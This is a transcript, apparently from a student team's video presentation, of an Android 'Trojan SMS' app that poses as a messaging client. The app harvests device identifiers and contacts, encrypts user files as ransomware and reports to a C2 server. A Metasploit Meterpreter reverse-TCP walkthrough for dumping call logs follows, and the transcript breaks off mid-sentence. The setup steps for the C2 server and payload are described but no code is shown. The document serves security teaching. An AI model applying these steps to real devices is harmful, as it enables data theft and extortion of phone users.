Good morning, afternoon, or evening whenever you are watching this video. My name is Ryan and along with me are my teammates Xian Fu, Daniel, Eddieson, and James. We will be presenting our Trojan SMS application. First, I'll point out a few features of the application. So when the application is first started, you will be greeted with this screen. It is similar to a SMS application that you will find on the default installation of Android. So a user can start a conversation with one of their contacts. So let's start a conversation with Prof. So we can type, "Hi, Prof. Can I see my grades on LMS?" And of course, it functions like a normal SMS application. It integrates with the contacts to allow users to select contact information. You can also actually send media files from this menu as well. For the permissions, we can actually see the permissions here. These are the permissions that are asked to the users to grant, and these permissions are usually the permissions that are required by applications of this type. So now I'll pass the time over to my teammate to talk about the malicious activities.
Thank you, Ryan. Now I'll talk about the excessive permission to gain data. As a messaging application, it will make sense for the user to grant us permissions with access to their contacts, messages, and files in the phone. Main activity will extract all the sensitive information such as the IMEI number, phone model, build number, serial SIM, the owner phone number, as well as the contact list, and this could all be found inside your logcat once you install and run the app. Now, this malware application also acts as a ransomware and will encrypt all the user files and render it unable to open. In order for that to happen, first you will need to set up your own C2 server, which you can use your own device such as your own laptop. Open up the main activity file, go to LAN138 and change this to your own IP address. Next, pull up your PowerShell and go to the C2 server folder and run the Python script. It will prompt you for a passphrase, and once you enter the correct passphrase, it will start listening for any JSON files. Now back to the application. Once we run the application and grant the permissions, it will start syncing your SMSs with the app. And at the same time, you encrypt all the user's files and send the information back to the server. Now when I check my files over here, I realize that both of them are unable to open because they are encrypted. So how do we go about getting our files back? Simple. First we go to the application and click on decrypt everything. On the C2 server side, go and open your store.json file, as it contains all sensitive information such as the build number, your IMEI, phone number, and your contact list. But what we're really looking for over here is the decryption key, which is after the equal sign, all the way before the ampersand. Copy it, and we will replace this with the decryption key. Once you decrypt it, open up your files and ensure that you can see Daniel smiling. Okay, it's highly advisable to remove and uninstall this app to prevent any further damages. On the left we have our Kali Linux split screen, and on the right we show you what happens on the phone. We'll be injecting a remote access Trojan and gaining remote access to the device using a payload. So on Android we just run app and grant all permissions. Once you run Metasploit on your desktop, you first configure the payload by typing use exploit/multi/handler, and next you type in set payload space android /meterpreter/reverse TCP. Once it's set, you have to set your L host, which is where you want the Trojan to send the data to, and the L port, which is stating the port where it will be sent. And now that it's done, just run it. It will take a while. It will say reverse TCP handler has started and you'll be set on listening mode. So to achieve this, we are going to use Metasploit, APK2 and zipline to achieve this purpose. Once a connection is established, you start setting stage and open Meterpreter session. Now, the Meterpreter Dashboard will appear and you will have a suite of tools you can use, such as stealing contacts, SMS, retrieve call log, just to name a few. Now we check the phone is rooted and the device is not rooted. For the purpose of this demonstration and the interest of time, we will be just retrieving the call log. So now we'll type dump call log and you'll fetch the entries and the call log will be sent to a text file. Once it's successfully extracted into a text file, we can see from the Android phone and the Kali side. Now when you open the file, you'll find that the call log on the Android phone as well as the text file on the Kali side is exactly identical. So this tells us that we have successfully extracted